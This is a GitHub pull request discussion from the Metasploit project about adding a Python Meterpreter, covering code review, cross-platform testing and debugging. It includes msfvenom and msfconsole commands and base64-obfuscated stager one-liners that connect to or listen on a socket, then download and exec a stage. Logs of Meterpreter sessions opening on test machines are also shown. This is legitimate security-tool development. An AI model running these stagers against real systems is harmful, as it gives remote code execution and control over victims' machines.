New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Python Meterpreter #2244

Merged
merged 10 commits into from Aug 30, 2013

Conversation

Projects
None yet
6 participants
@zeroSteiner
Copy link
Contributor

zeroSteiner commented Aug 19, 2013

This PR adds support for a native Python meterpreter.

The meterpreter has been tested on:

  • Python 2.4, 2.6 & 2.7 on Linux
  • Python 2.6 on OSX
  • Python 2.5, 2.6 & 2.7 on Windows

The stagers are compatible with Python 3.x, however the meterpreter itself is not due to the explicit encoding not being supported by older versions of Python. Almost all of the code was written using the PHP meterpreter as a guide.

msf3-git (S:1 J:0)  exploit(handler) > sessions

Active sessions
===============

  Id  Type                       Information              Connection
  --  ----                       -----------              ----------
  1   meterpreter python/python  Administrator @ Exploit  192.168.90.1:4444 -> 192.168.90.133:1030 (192.168.90.133)

msf3-git (S:1 J:0)  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer     : Exploit
OS           : Windows XP 5.1.2600
Architecture : x86
Meterpreter  : python/python
meterpreter > 
@limhoff-r7

This comment has been minimized.

Why is 'Python' in the class name twice?

This comment has been minimized.

Copy link

limhoff-r7 replied Aug 14, 2013

Underscores should not be used in Ruby class names by convention. The standard translation from underscore file name like 'meterpreter_python' would be the camelcase MeterpreterPython for a class name.

This comment has been minimized.

Copy link
Owner

zeroSteiner replied Aug 14, 2013

I named it because of lib/msf/base/sessions/meterpreter_php.rb line rapid7#13 and I was trying to be consistent. The other meterpreter_* files also use names which begin with Meterpreter_ should I still change this?

This comment has been minimized.

Copy link

limhoff-r7 replied Aug 15, 2013

@jlee-r7 is this non-Ruby standard naming scheme required for the meterpreter sessions to load and run correctly?

@limhoff-r7

This comment has been minimized.

Please sort your imports so it's easier to check if a library is already imported when modifying the code.

This comment has been minimized.

Copy link
Owner

zeroSteiner replied Aug 15, 2013

I just pushed a commit which sorts these alphabetically, thanks for the feedback.

@@ -84,6 +84,7 @@
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'

This comment has been minimized.

@KronicDeth

KronicDeth Aug 19, 2013

I'm going to have to add this to https://github.com/rapid7/metasploit-model/blob/feature/module-caching/lib/metasploit/model/architecture.rb. Looks like I need to add 'dalvik' too since android meterpreter's been merged since I started the module-caching rework.

@Meatballs1

This comment has been minimized.

Copy link
Contributor

Meatballs1 commented Aug 21, 2013

I was unsuccessful testing this on windows x64 with 2.7.3 nor the version of python bundled with Kali.

Generated payload with generate -f blah -t raw

It connected to the stager but the stage didn't appear to execute and python just hung indefinitely

Are there steps to build/run this?

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Aug 21, 2013

I just checked it on x86 Kali running Python 2.7.3, just like what you did, are you using the 32-bit version of Kali?
Also if python just hangs could you send me the stack trace that's printed when you hit control-c?

I'll look into the Windows one as well.

msf3-git (S:0 J:0) > use payload/python/meterpreter/reverse_tcp 
msf3-git (S:0 J:0)  payload(reverse_tcp) > show options 

Module options (payload/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

msf3-git (S:0 J:0)  payload(reverse_tcp) > set LHOST 192.168.90.1
LHOST => 192.168.90.1
msf3-git (S:0 J:0)  payload(reverse_tcp) > generate -f blah -t raw
[*] Writing 277 bytes to blah...
msf3-git (S:0 J:0)  payload(reverse_tcp) >

Then on Kali:

python Desktop/blah

Then back on the attackers machine:

msf3-git (S:0 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Starting the payload handler...
[*] Sending stage (13751 bytes) to 192.168.90.129
[*] Meterpreter session 1 opened (192.168.90.1:4444 -> 192.168.90.129:50614) at 2013-08-21 09:23:11 -0400

meterpreter > sysinfo
Computer     : kali
OS           : Linux 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8
Architecture : i686
Meterpreter  : python/python
meterpreter > 
@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Aug 21, 2013

Same thing for 64-bit Python 2.7.2 in 64-bit Windows 7 SP1:

msf3-git (S:1 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.1:4444 
[*] Starting the payload handler...
[*] Sending stage (13751 bytes) to 192.168.90.149
[*] Meterpreter session 3 opened (192.168.90.1:4444 -> 192.168.90.149:13464) at 2013-08-21 09:37:05 -0400

meterpreter > sysinfo
Computer     : SWIN7TB92
OS           : Windows 7 6.1.7601
Architecture : x86_64
Meterpreter  : python/python
meterpreter > 

When you tested it on Windows was your python installation 32-bit or 64-bit?

@Meatballs1

This comment has been minimized.

Copy link
Contributor

Meatballs1 commented Aug 21, 2013

Afaik it just said keyboard interrupt on the exec function. x86 kali VM image, would have to double check what python architecture on windows.

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Aug 21, 2013

Would it be possible for you to please send me the output of what you had tried? I'm having difficulty reproducing this error and some console output would help me a lot.

@todb

This comment has been minimized.

Copy link
Contributor

todb commented Aug 21, 2013

Hey @zeroSteiner, btw, I'm really excited about a python Meterpreter,
especially given that modern Linux systems all tend to ship with python by
default for config reasons. So, thanks tons for your work on this, and I
hope we can land this soon.

@limhoff-r7

This comment has been minimized.

Copy link
Contributor

limhoff-r7 commented Aug 21, 2013

Python (and Perl) are part of the LSB (Linux Standard Base) as interpreted languages: https://wiki.linuxfoundation.org/en/LsbInterpretedLanguage. Python was added to LSB 3.2 and Perl has been in since then too. LSB 3.2 was released in 2008.

@limhoff-r7

This comment has been minimized.

Copy link
Contributor

limhoff-r7 commented Aug 21, 2013

Java was added (though optional) to LSB 4.0 http://www.linuxbase.org/navigator/browse/intlang.php

@Meatballs1

This comment has been minimized.

Copy link
Contributor

Meatballs1 commented Aug 21, 2013

Just been able to retry it, same payload .py. Fresh startup of metasploit:

use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.1.121

Worked fine on both Kali x86 Python 2.7.3 and Windows 7 x64 Python 2.7.3 x64.

No idea what went wrong last night!

Bind payload however:

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (13751 bytes) to 192.168.1.121
[*] 192.168.1.121 - Meterpreter session 6 closed.  Reason: Died
[*] Meterpreter session 6 opened (127.0.0.1 -> 127.0.0.1) at 2013-08-21 19:40:02 +0100
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id


root@kali:~# python pbind.py 
Traceback (most recent call last):
  File "pbind.py", line 1, in <module>
    import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5iaW5kKCgnJyw0NDQ0KSkKcy5saXN0ZW4oMSkKYyxhPXMuYWNjZXB0KCkKbD1zdHJ1Y3QudW5wYWNrKCc+SScsYy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1jLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6Y30pCg=='))
  File "<string>", line 7, in <module>
socket.error: [Errno 107] Transport endpoint is not connected


Windows:

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (13751 bytes) to 192.168.1.4
[*] Meterpreter session 9 opened (192.168.1.121:46923 -> 127.0.0.1) at 2013-08-21 19:44:19 +0100
[-] Failed to load extension: No response was received to the core_loadlib request.
[*] 192.168.1.4 - Meterpreter session 9 closed.  Reason: Died

[-] Invalid session id


C:\Share>python pbind.py
Traceback (most recent call last):
  File "pbind.py", line 1, in <module>
    import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZX
Quc29ja2V0KDIsMSkKcy5iaW5kKCgnJyw0NDQ0KSkKcy5saXN0ZW4oMSkKYyxhPXMuYWNjZXB0KCkKbD
1zdHJ1Y3QudW5wYWNrKCc+SScsYy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZC
khPWw6CglkKz1jLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6Y30pCg=='))
  File "<string>", line 7, in <module>
socket.error: [Errno 10057] A request to send or receive data was disallowed bec
ause the socket is not connected and (when sending on a datagram socket using a
sendto call) no address was supplied

Note in connection 127.0.0.1 (not sure if it is significant) it is binding to 0.0.0.0.

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Aug 21, 2013

@Meatballs1 thanks for testing it again! That issue you were experiencing was the result of a typo I had made in the bind stager causing python to read from the server socket instead of the client.

@Meatballs1

This comment has been minimized.

Copy link
Contributor

Meatballs1 commented Aug 21, 2013

Cool that did the trick, bind payload working for me now.

@Meatballs1

This comment has been minimized.

Copy link
Contributor

Meatballs1 commented Aug 30, 2013

Things like upload and cat don't work on Windows and error with [-] core_channel_open: Operation failed: 1 but doesn't crash and can drop down to a shell if needed so pretty usable. They work fine on Linux.

@Meatballs1 Meatballs1 merged commit f490277 into rapid7:master Aug 30, 2013

1 check passed

default The Travis CI build passed
Details

Meatballs1 added a commit that referenced this pull request Aug 30, 2013

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Aug 30, 2013

Thanks @Meatballs1 I'm looking into the issue with files on Windows, it looks like they are trying to be opened with a mode of 'rbb' which is causing the open call to fail.

I'll try to put together a PR soon which will fix this issue.

@phillips321

This comment has been minimized.

Copy link

phillips321 commented Sep 6, 2013

Is there any reason why you have to create the payload from msfconsole and not that standard way of using msfvenom?

root@kali:~# msfvenom --help-formats Executable formats dll, exe, exe-service, exe-small, exe-only, elf, macho, vba, vba-exe, vbs, loop-vbs, asp, aspx, war, psh, psh-net Transform formats raw, ruby, rb, perl, pl, bash, sh, c, csharp, js_be, js_le, java, python, py, powershell, ps1, vbscript, vbapplication

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Sep 6, 2013

@phillips321 you can create the payload from msfvenom.
This works just fine for me:

msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
@phillips321

This comment has been minimized.

Copy link

phillips321 commented Sep 6, 2013

Ah ok, thanks for this tip :-) 👍

@zeroSteiner zeroSteiner deleted the zeroSteiner:python-meterpreter-dev branch Feb 6, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment